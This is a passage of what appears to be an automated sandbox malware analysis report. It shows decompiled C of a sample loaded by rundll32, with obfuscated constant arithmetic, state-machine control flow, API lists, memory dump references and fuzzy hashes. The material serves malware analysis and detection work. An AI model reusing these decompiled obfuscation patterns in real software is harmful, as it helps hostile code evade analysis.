				_v40 = 0xc2b8;
				_v40 = _v40 + 0x609d;
				_v40 = _v40 ^ 0x00014342;
				_v24 = 0x21cc;
				_v24 = _v24 << 5;
				_v24 = _v24 << 0xa;
				_v24 = _v24 ^ 0x10e64576;
				_v48 = 0xc8ed;
				_v48 = _v48 + 0xffffe729;
				_v48 = _v48 ^ 0x00009812;
				_v32 = 0xdf82;
				_v32 = _v32 ^ 0xa0cf88d1;
				_v32 = _v32 >> 4;
				_v32 = _v32 ^ 0x0a0ce5c9;
				_v44 = 0xf2d1;
				_v44 = _v44 + 0x3831;
				_v44 = _v44 ^ 0x00011e20;
				_t120 =  *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 1, 0);
				_t149 = _t120;
				if(_t120 != 0) {
					E00B32349(_v12, _v36, _v20, _v8, _t132);
					_v60 =  &_v124;
					_v56 = E00B2F85D(_v16, _t149,  &_v52, _v28, _v40, _v24);
					 *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 0xa,  &_v60,  &_v124);
					E00B32025(_v48, _v56, _v32, _v44);
				}
				return 0;
			}

0x00b22a36
0x00b22a3f
0x00b22a46
0x00b22a53
0x00b22a58
0x00b22a5d
0x00b22a64
0x00b22a6f
0x00b22a72
0x00b22a75
0x00b22a78
0x00b22a7f
0x00b22a86
0x00b22a8d
0x00b22a94
0x00b22a9b
0x00b22aa6
0x00b22aa9
0x00b22ab0
0x00b22ab7
0x00b22abe
0x00b22aca
0x00b22acb
0x00b22ad0
0x00b22adf
0x00b22ae2
0x00b22ae9
0x00b22af5
0x00b22af8
0x00b22aff
0x00b22b06
0x00b22b0d
0x00b22b14
0x00b22b1b
0x00b22b22
0x00b22b26
0x00b22b2a
0x00b22b31
0x00b22b38
0x00b22b3f
0x00b22b46
0x00b22b4d
0x00b22b54
0x00b22b58
0x00b22b5f
0x00b22b66
0x00b22b6d
0x00b22b77
0x00b22b7a
0x00b22b7c
0x00b22b8f
0x00b22b9d
0x00b22bb2
0x00b22bbe
0x00b22bcd
0x00b22bd3
0x00b22bda

Strings

18, xrefs: 00B22B66
s, xrefs: 00B22A9B
^, xrefs: 00B22A86
+/F, xrefs: 00B22A78

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: +/F$18$^$s
API String ID: 0-1171060364
Opcode ID: 70d39a78e3ab786549318ccb702bdfc1bcc7dde35113822f4650e37c684f7d3d
Instruction ID: f6299650d564b7a1cd6c8860f16f9d4229db175c6101451dee354c7a975acc5f
Opcode Fuzzy Hash: 70d39a78e3ab786549318ccb702bdfc1bcc7dde35113822f4650e37c684f7d3d
Instruction Fuzzy Hash: 4C51D472D01309AFEF08CFE1C94A9DEBBB5FB04314F208159D511B62A0D7B96A45DF94

Uniqueness

Uniqueness Score: -1.00%

Function 100307F0, Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 10023FB6: GetLastError.KERNEL32(?,70D9FFF6,?,1000F7D4,70D9FFF6,?,00000000,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10023FBB
Part of subcall function 10023FB6: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10024059

Part of subcall function 10023FB6: _free.LIBCMT ref: 10024018
Part of subcall function 10023FB6: _free.LIBCMT ref: 1002404E

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 10030844
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 1003088E
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 10030954

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: InfoLocale$ErrorLast_free
String ID:
API String ID: 3140898709-0
Opcode ID: 13de748c05b97822012b37be4217f8bf4a8ec62a71ff1104d81bc350713f3c11
Instruction ID: e33891a80eec16c603dc44fbbac949e3ee41790992ddc179ef950c9f40fc70ca
Opcode Fuzzy Hash: 13de748c05b97822012b37be4217f8bf4a8ec62a71ff1104d81bc350713f3c11
Instruction Fuzzy Hash: DC61A3719512179FEB1ACF28DD92BAAB3E8EF04342F11447AFD05CA186E774D941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 100272AB, Relevance: 4.6, APIs: 3, Instructions: 132fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 10027346
FindNextFileW.KERNEL32(00000000,?), ref: 100273C4
FindClose.KERNEL32(00000000), ref: 10027406

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 584debd9bdd979560db08173b8236b53a7293f403173a0c8924e0c781fc6f144
Instruction ID: 733ca08340b476a7a0ede7b5a0695072a433af0d21f20a010c77cdf0311fa954
Opcode Fuzzy Hash: 584debd9bdd979560db08173b8236b53a7293f403173a0c8924e0c781fc6f144
Instruction Fuzzy Hash: 91412A72900115AFDB24EF65ED89DABB7B9FB89354F814099F90DD3141EB309E80CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000E144, Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 1000E23C
SetUnhandledExceptionFilter.KERNEL32 ref: 1000E246
UnhandledExceptionFilter.KERNEL32(?), ref: 1000E253

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 66bca6bf5f40b5c8aafd732f6b834b70bcdac2935f7d27f914a22653c0949b4d
Instruction ID: 5921ed57366bc2a97905c57a6575bd65bc59e8fc3f67e6b7d2a13807858a3588
Opcode Fuzzy Hash: 66bca6bf5f40b5c8aafd732f6b834b70bcdac2935f7d27f914a22653c0949b4d
Instruction Fuzzy Hash: 1931C4749012289BDB21DF64D989B8DBBB8FF18350F5041EAE50CA7251EB709F858F44

Uniqueness

Uniqueness Score: -1.00%

Function 1001065E, Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,1001065D,00000000,70D9FFF6,?,00000000,?,1000E78E), ref: 10010680
TerminateProcess.KERNEL32(00000000,?,1001065D,00000000,70D9FFF6,?,00000000,?,1000E78E), ref: 10010687
ExitProcess.KERNEL32 ref: 10010699

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: dd72089d1d1540554cbd6dfcac94ad096089794e6a09164e6b1116331a8ccb41
Instruction ID: 7189f3a5cfa41052a58c3eb9bbc362c100aebb528aeb995cb62dcc9c85320567
Opcode Fuzzy Hash: dd72089d1d1540554cbd6dfcac94ad096089794e6a09164e6b1116331a8ccb41
Instruction Fuzzy Hash: E1E04631200248ABDB01EF10CE88A083BA9FBA2281B414415F905CA131CB75EC92CA94

Uniqueness

Uniqueness Score: -1.00%

Function 00B373AC, Relevance: 4.0, Strings: 3, Instructions: 219
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00B373AC() {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _t194;
				intOrPtr _t196;
				intOrPtr _t199;
				intOrPtr _t202;
				intOrPtr _t204;
				intOrPtr _t205;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				void* _t238;
				char _t242;
				signed int* _t243;
				void* _t245;

				_t243 =  &_v108;
				_v24 = 0x44d5d8;
				_t205 = 0;
				_v20 = 0;
				_v40 = 0x23cf;
				_v40 = _v40 ^ 0xbe38916f;
				_v40 = _v40 ^ 0xbe38820d;
				_v108 = 0x2e00;
				_v108 = _v108 + 0xe6b6;
				_v108 = _v108 * 0x5d;
				_t238 = 0x219f160f;
				_t207 = 0xe;
				_v108 = _v108 / _t207;
				_v108 = _v108 ^ 0x000708e5;
				_v56 = 0xac50;
				_t208 = 0x74;
				_v56 = _v56 / _t208;
				_v56 = _v56 ^ 0x00005612;
				_v48 = 0xf915;
				_v48 = _v48 + 0xc201;
				_v48 = _v48 ^ 0x0001bde6;
				_v76 = 0xa4d1;
				_v76 = _v76 << 0xb;
				_v76 = _v76 + 0x2090;
				_v76 = _v76 ^ 0x0526efdc;
				_v104 = 0x1331;
				_v104 = _v104 ^ 0x9278d736;
				_v104 = _v104 << 0xf;
				_v104 = _v104 << 3;
				_v104 = _v104 ^ 0x101c0c8f;
				_v52 = 0x4912;
				_t209 = 0x53;
				_v52 = _v52 * 0x5f;
				_v52 = _v52 ^ 0x001b11ba;
				_v80 = 0x36f7;
				_v80 = _v80 | 0x0c78674c;
				_v80 = _v80 + 0xffff3df1;
				_v80 = _v80 ^ 0x0c77a943;
				_v84 = 0x9f3a;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0x7966a269;
				_v84 = _v84 ^ 0x79f9b7a1;
				_v60 = 0xac57;
				_v60 = _v60 ^ 0x3fa2bf2a;
				_v60 = _v60 ^ 0x3fa276dc;
				_v88 = 0xe218;
				_v88 = _v88 | 0xea5468c5;
				_v88 = _v88 << 0x10;
				_v88 = _v88 ^ 0xeadd1cb3;
				_v64 = 0x6c6b;
				_v64 = _v64 + 0xffff53e7;
				_v64 = _v64 ^ 0xffffd13f;
				_v92 = 0x6a88;
				_v92 = _v92 >> 1;
				_v92 = _v92 ^ 0xe005aace;
				_v92 = _v92 ^ 0xe005a166;
				_v100 = 0xd6b9;
				_v100 = _v100 ^ 0x5f91bbd5;
				_v100 = _v100 ^ 0x5ce69075;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 ^ 0x00003faf;
				_v44 = 0xc8e7;
				_v44 = _v44 / _t209;
				_v44 = _v44 ^ 0x00005627;
				_v72 = 0xdbaa;
				_t210 = 0x49;
				_v72 = _v72 / _t210;
				_v72 = _v72 | 0xff4e0ba5;
				_v72 = _v72 ^ 0xff4e47cb;
				_v68 = 0x962f;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0x00006f62;
				_v96 = 0xef5c;
				_t211 = 0x44;
				_v96 = _v96 * 0x25;
				_v96 = _v96 / _t211;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0x0001262b;
				_t237 = _v36;
				_t242 = _v36;
				goto L1;
				do {
					while(1) {
						L1:
						_t245 = _t238 - 0x219f160f;
						if(_t245 > 0) {
							break;
						}
						if(_t245 == 0) {
							_t238 = 0x2394b362;
							continue;
						}
						if(_t238 == 0x8b9146f) {
							E00B39465(_v68, _t237, _v96);
							L23:
							return _t205;
						}
						if(_t238 == 0x93670d9) {
							_t194 = E00B3340A(_v80,  &_v32, _v84,  &_v16);
							asm("sbb esi, esi");
							_pop(_t211);
							_t238 = ( ~_t194 & 0xf6f92468) + 0x24090f6a;
							continue;
						}
						if(_t238 == 0x155b4458) {
							_t196 = E00B389D3(_t242, _v108,  &_v36, _v56);
							_t237 = _t196;
							_pop(_t211);
							if(_t196 == 0) {
								goto L23;
							}
							_t238 = 0x35a1dc77;
							continue;
						}
						if(_t238 != 0x1b0233d2) {
							goto L20;
						} else {
							_t199 =  *0xb3ca2c; // 0x505cc8
							E00B36128(_v60, _v88, _v12, _t199 + 0x230, _v64, _v92, _v8 + 1);
							_t202 =  *0xb3ca2c; // 0x505cc8
							_t211 = _v16;
							_t243 =  &(_t243[5]);
							_t205 = 1;
							_t238 = 0x24090f6a;
							 *(_t202 + 0x450) = _v16;
							continue;
						}
					}
					if(_t238 == 0x2394b362) {
						_t242 = E00B2F4D0(_t211);
						_t238 = 0x155b4458;
						goto L20;
					}
					if(_t238 == 0x24090f6a) {
						E00B2F536(_v100, _v44, _v72, _v32);
						_pop(_t211);
						_t238 = 0x8b9146f;
						goto L1;
					}
					if(_t238 != 0x35a1dc77) {
						goto L20;
					}
					_t238 = 0x8b9146f;
					if(_v36 > 2) {
						_t211 = _v48;
						_t204 = E00B2EA4C( *((intOrPtr*)(_t237 + 8)), _v76, _v104,  &_v28, _v52);
						_t243 =  &(_t243[4]);
						_v32 = _t204;
						if(_t204 != 0) {
							_t238 = 0x93670d9;
						}
					}
					goto L1;
					L20:
				} while (_t238 != 0x36620d3);
				goto L23;
			}

0x00b373ac
0x00b373af
0x00b373ba
0x00b373bc
0x00b373c0
0x00b373c8
0x00b373d0
0x00b373d8
0x00b373e0
0x00b373f2
0x00b373f6
0x00b373ff
0x00b37404
0x00b3740a
0x00b37412
0x00b3741e
0x00b37423
0x00b37429
0x00b37431
0x00b37439
0x00b37441
0x00b37449
0x00b37451
0x00b37456
0x00b3745e
0x00b37466
0x00b3746e
0x00b37476
0x00b3747b
0x00b37480
0x00b37488
0x00b37495
0x00b37496
0x00b3749a
0x00b374a2
0x00b374aa
0x00b374b2
0x00b374ba
0x00b374c2
0x00b374ca
0x00b374cf
0x00b374d7
0x00b374df
0x00b374e7
0x00b374ef
0x00b374f7
0x00b374ff
0x00b37507
0x00b3750c
0x00b37514
0x00b3751c
0x00b37524
0x00b3752c
0x00b37534
0x00b37538
0x00b37540
0x00b37548
0x00b37550
0x00b37558
0x00b37560
0x00b37565
0x00b3756d
0x00b3757b
0x00b3757f
0x00b37587
0x00b37597
0x00b3759c
0x00b375a2
0x00b375aa
0x00b375b2
0x00b375ba
0x00b375bf
0x00b375c4
0x00b375cc
0x00b375d9
0x00b375da
0x00b375e4
0x00b375e8
0x00b375ec
0x00b375f4
0x00b375f8
0x00b375f8
0x00b375fc
0x00b375fc
0x00b375fc
0x00b375fc
0x00b37602
0x00000000
0x00000000
0x00b37608
0x00b376e2
0x00000000
0x00b376e2
0x00b37614
0x00b37793
0x00b3779c
0x00b377a2
0x00b377a2
0x00b37620
0x00b376c4
0x00b376ce
0x00b376d6
0x00b376d7
0x00000000
0x00b376d7
0x00b3762c
0x00b37698
0x00b3769d
0x00b376a0
0x00b376a3
0x00000000
0x00000000
0x00b376a9
0x00000000
0x00b376a9
0x00b37634
0x00000000
0x00b3763a
0x00b37648
0x00b37662
0x00b37667
0x00b3766e
0x00b37675
0x00b37678
0x00b37679
0x00b3767e
0x00000000
0x00b3767e
0x00b37634
0x00b376f2
0x00b37774
0x00b37776
0x00000000
0x00b37776
0x00b376fa
0x00b3775a
0x00b37760
0x00b37761
0x00000000
0x00b37761
0x00b37702
0x00000000
0x00000000
0x00b37709
0x00b3770e
0x00b37728
0x00b3772c
0x00b37731
0x00b37734
0x00b3773a
0x00b37740
0x00b37740
0x00b3773a
0x00000000
0x00b3777b
0x00b3777b
0x00000000

Strings

'V, xrefs: 00B3757F
bo, xrefs: 00B375C4
\, xrefs: 00B375CC

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 'V$\$bo
API String ID: 0-4178943049
Opcode ID: 7b1ac66c22ce639a7429425c5985a0942d73004f01bb4dce367097f438fdde40
Instruction ID: 2dd258d3e99481b0abcc5d08e7bbba117d545c08dc660a822e04a26d6df3b1e8
Opcode Fuzzy Hash: 7b1ac66c22ce639a7429425c5985a0942d73004f01bb4dce367097f438fdde40
Instruction Fuzzy Hash: 03A152B150C3429FD368CF28C48941BFBF1FBC4758F21896DF59996260CBB58A488F86

Uniqueness

Uniqueness Score: -1.00%

Function 00B296CD, Relevance: 3.9, Strings: 3, Instructions: 191
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00B296CD(signed int* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				unsigned int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				unsigned int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t162;
				signed int _t179;
				void* _t192;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t200;
				intOrPtr* _t222;
				signed int* _t223;
				signed int* _t226;

				_push(_a8);
				_t222 = _a4;
				_t223 = __ecx;
				_push(_t222);
				_push(__ecx);
				E00B2602B(_t162);
				_v80 = 0xadf4;
				_t226 =  &(( &_v140)[4]);
				_t200 = 0xade8ac2;
				_t193 = 0x38;
				_v80 = _v80 / _t193;
				_v80 = _v80 ^ 0x00005e4d;
				_v88 = 0xd682;
				_v88 = _v88 ^ 0xf51d39be;
				_v88 = _v88 ^ 0xf51dab09;
				_v96 = 0x72b2;
				_v96 = _v96 ^ 0xfa4c809d;
				_v96 = _v96 ^ 0xfa4c99cb;
				_v116 = 0x90ca;
				_v116 = _v116 | 0x91d06c09;
				_v116 = _v116 ^ 0x5d2d7dc0;
				_v116 = _v116 ^ 0xccfdf140;
				_v124 = 0x94f4;
				_v124 = _v124 >> 9;
				_t194 = 0x7e;
				_v124 = _v124 / _t194;
				_v124 = _v124 >> 1;
				_v124 = _v124 ^ 0x00005a93;
				_v92 = 0xb2da;
				_v92 = _v92 >> 0xf;
				_v92 = _v92 ^ 0x00004526;
				_v132 = 0xfe39;
				_v132 = _v132 ^ 0x94a2bb32;
				_v132 = _v132 + 0xffff197d;
				_v132 = _v132 + 0xa385;
				_v132 = _v132 ^ 0x94a23d21;
				_v104 = 0xe4d2;
				_v104 = _v104 ^ 0x49cfaa80;
				_v104 = _v104 | 0x48b9e868;
				_v104 = _v104 ^ 0x49ffe136;
				_v112 = 0xb598;
				_v112 = _v112 ^ 0x0d96fbe5;
				_v112 = _v112 + 0x88b9;
				_v112 = _v112 ^ 0x0d96d484;
				_v136 = 0x3e03;
				_v136 = _v136 ^ 0x29ac334c;
				_v136 = _v136 >> 9;
				_v136 = _v136 << 8;
				_v136 = _v136 ^ 0x14d602a1;
				_v120 = 0xd3c3;
				_t195 = 0x26;
				_v120 = _v120 / _t195;
				_t196 = 0x3e;
				_v120 = _v120 * 0x17;
				_v120 = _v120 ^ 0x0000f1c0;
				_v140 = 0x72b1;
				_v140 = _v140 + 0xffffab40;
				_v140 = _v140 << 0xe;
				_v140 = _v140 / _t196;
				_v140 = _v140 ^ 0x001e8f72;
				_v128 = 0x9994;
				_v128 = _v128 + 0xffff8c6c;
				_v128 = _v128 + 0xa4f6;
				_t197 = 0x3d;
				_v128 = _v128 / _t197;
				_v128 = _v128 ^ 0x00001242;
				_v100 = 0x8258;
				_v100 = _v100 + 0xffff85b7;
				_v100 = _v100 * 0x51;
				_v100 = _v100 ^ 0x000280a1;
				_v84 = 0x5c44;
				_v84 = _v84 ^ 0x1285eccb;
				_v84 = _v84 ^ 0x12858e57;
				_v108 = 0x7f88;
				_v108 = _v108 | 0x4d438ffe;
				_v108 = _v108 + 0xffff02b4;
				_v108 = _v108 ^ 0x4d436acf;
				do {
					while(_t200 != 0xade8ac2) {
						if(_t200 == 0xeed9730) {
							_push(_t200);
							_push(_t200);
							_t179 = E00B28736(_t223[1]);
							 *_t223 = _t179;
							__eflags = _t179;
							if(__eflags != 0) {
								_t200 = 0x173d5c4e;
								continue;
							}
						} else {
							if(_t200 == 0xffe2862) {
								E00B3360F( &_v76, _v120, _v140,  *_t222, _v128);
								_t226 =  &(_t226[3]);
								_t200 = 0x220c9c88;
								continue;
							} else {
								if(_t200 == 0x173d5c4e) {
									E00B350F2( &_v76, _v104, _v112, _v136, _t223);
									_t226 =  &(_t226[3]);
									_t200 = 0xffe2862;
									continue;
								} else {
									if(_t200 == 0x220c9c88) {
										E00B27998(_v100, _v84, __eflags, _t222 + 4,  &_v76, _v108);
									} else {
										if(_t200 != 0x2d9f638c) {
											goto L13;
										} else {
											_t207 = _t222;
											_t223[1] = E00B37A0F(_t222);
											_t192 = E00B278A5(_t222, _t207, 0x1000, _t207, 0x400);
											_t226 =  &(_t226[4]);
											_t200 = 0xeed9730;
											_t223[1] = _t223[1] + _t192;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t223;
						_t161 =  *_t223 != 0;
						__eflags = _t161;
						return 0 | _t161;
					}
					 *_t223 = 0;
					_t200 = 0x2d9f638c;
					_t223[1] = 0;
					L13:
					__eflags = _t200 - 0x18ac994b;
				} while (__eflags != 0);
				goto L16;
			}

0x00b296d7
0x00b296de
0x00b296e5
0x00b296e7
0x00b296e9
0x00b296ea
0x00b296ef
0x00b296f7
0x00b29700
0x00b29707
0x00b2970c
0x00b29712
0x00b2971a
0x00b29722
0x00b2972a
0x00b29732
0x00b2973a
0x00b29742
0x00b2974a
0x00b29752
0x00b2975a
0x00b29762
0x00b2976a
0x00b29772
0x00b2977b
0x00b29780
0x00b29786
0x00b2978a
0x00b29792
0x00b2979a
0x00b2979f
0x00b297a7
0x00b297af
0x00b297b7
0x00b297bf
0x00b297c7
0x00b297cf
0x00b297d7
0x00b297df
0x00b297e7
0x00b297ef
0x00b297f7
0x00b297ff
0x00b29807
0x00b2980f
0x00b29817
0x00b2981f
0x00b29824
0x00b29829
0x00b29831
0x00b2983d
0x00b29842
0x00b2984d
0x00b2984e
0x00b29852
0x00b2985a
0x00b29862
0x00b2986a
0x00b29875
0x00b29879
0x00b29883
0x00b29890
0x00b29898
0x00b298a6
0x00b298a9
0x00b298ad
0x00b298b5
0x00b298bd
0x00b298ca
0x00b298ce
0x00b298d6
0x00b298de
0x00b298e6
0x00b298ee
0x00b298f6
0x00b298fe
0x00b29906
0x00b29910
0x00b29910
0x00b29922
0x00b299d7
0x00b299d8
0x00b299dc
0x00b299e1
0x00b299e5
0x00b299e7
0x00b299e9
0x00000000
0x00b299e9
0x00b29928
0x00b2992e
0x00b299b9
0x00b299be
0x00b299c1
0x00000000
0x00b29930
0x00b29932
0x00b29995
0x00b2999a
0x00b2999d
0x00000000
0x00b29934
0x00b2993a
0x00b29a1d
0x00b29940
0x00b29946
0x00000000
0x00b2994c
0x00b2994c
0x00b29953
0x00b29972
0x00b29977
0x00b2997a
0x00b2997f
0x00000000
0x00b2997f
0x00b29946
0x00b2993a
0x00b29932
0x00b2992e
0x00b29a26
0x00b29a28
0x00b29a2c
0x00b29a2c
0x00b29a36
0x00b29a36
0x00b299f0
0x00b299f2
0x00b299f7
0x00b299fa
0x00b299fa
0x00b299fa
0x00000000

Strings

&E, xrefs: 00B2979F
D\, xrefs: 00B298D6
M^, xrefs: 00B29712

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &E$D\$M^
API String ID: 0-182273106
Opcode ID: 7e73a032ed4c88d170dab7654c0d89932568e0a188c774ecf291dec26883a179
Instruction ID: 4d42ee021cc1bfe5991697643b22712748fd3d2a0ff894b64d207598712a61cd
Opcode Fuzzy Hash: 7e73a032ed4c88d170dab7654c0d89932568e0a188c774ecf291dec26883a179
Instruction Fuzzy Hash: 688163715083819FD368CF25C88981BBBE0FBD4354F50891DF19A862A1E3B69A49CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00B2153C, Relevance: 3.9, Strings: 3, Instructions: 131
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00B2153C() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _t116;
				void* _t117;
				void* _t119;
				signed int _t122;
				signed int _t134;
				void* _t136;
				signed int _t137;
				signed int* _t138;

				_t138 =  &_v560;
				_v528 = 0xa2e9;
				_v528 = _v528 + 0xfffffe64;
				_t119 = 0x3a74a7f9;
				_v528 = _v528 ^ 0x0000e8bc;
				_v532 = 0xc148;
				_v532 = _v532 + 0x228e;
				_v532 = _v532 ^ 0x0000dc63;
				_v548 = 0x43c;
				_v548 = _v548 + 0xffff6922;
				_v548 = _v548 | 0xfd2a2fe1;
				_v548 = _v548 ^ 0xb6db9be5;
				_v548 = _v548 ^ 0x4924f3d5;
				_v544 = 0x1b71;
				_v544 = _v544 ^ 0xba1667e6;
				_v544 = _v544 >> 2;
				_v544 = _v544 << 7;
				_v544 = _v544 ^ 0x42cfc722;
				_v540 = 0x29dd;
				_v540 = _v540 + 0xa2;
				_v540 = _v540 ^ 0xc29808bd;
				_v540 = _v540 + 0xffff2b53;
				_v540 = _v540 ^ 0xc2975a13;
				_v556 = 0x7857;
				_v556 = _v556 ^ 0xa059c8e7;
				_v556 = _v556 << 9;
				_v556 = _v556 << 4;
				_v556 = _v556 ^ 0x361613d4;
				_v560 = 0x6ef2;
				_v560 = _v560 ^ 0x7dc12174;
				_v560 = _v560 * 0x52;
				_t136 = 0;
				_v560 = _v560 ^ 0x47eb388f;
				_v536 = 0x33fe;
				_v536 = _v536 + 0x28fb;
				_v536 = _v536 ^ 0x000029c0;
				_v552 = 0x40f6;
				_v552 = _v552 | 0x9b4debbc;
				_v552 = _v552 + 0x1ce1;
				_t134 = 0x7e;
				_t137 = _v536;
				_t135 = _v536;
				_v552 = _v552 / _t134;
				_v552 = _v552 ^ 0x013b83e5;
				_v524 = 0xe5bd;
				_v524 = _v524 ^ 0x97a1ef4c;
				_v524 = _v524 ^ 0x97a11b87;
				do {
					while(_t119 != 0x6cc9294) {
						if(_t119 == 0xcd96d8e) {
							_v560 = 0x65f6;
							_t122 = 0x33;
							_v560 = _v560 / _t122;
							_v560 = _v560 + 0xffffea35;
							_v560 = _v560 ^ 0xd5d8ecd6;
							_t136 =  ==  ? 1 : _t136;
						} else {
							if(_t119 == 0x11374e9c) {
								E00B2E29C(_v552, _v524, _t137);
								_t119 = 0xcd96d8e;
								continue;
							} else {
								if(_t119 == 0x31a842b3) {
									_t116 = E00B28697();
									_t135 = _t116;
									if(_t116 != 0) {
										_t119 = 0x34255e69;
										continue;
									}
								} else {
									if(_t119 == 0x34255e69) {
										_t117 = E00B260B9( &_v520, _v548, _v544, _t119, _v540, _t135, _v556);
										_t138 =  &(_t138[5]);
										if(_t117 != 0) {
											_t119 = 0x6cc9294;
											continue;
										}
									} else {
										if(_t119 != 0x3a74a7f9) {
											goto L14;
										} else {
											_t119 = 0x31a842b3;
											continue;
										}
									}
								}
							}
						}
						L17:
						return _t136;
					}
					_t137 = E00B228CE( &_v520, _v560, _v536);
					_t119 = 0x11374e9c;
					L14:
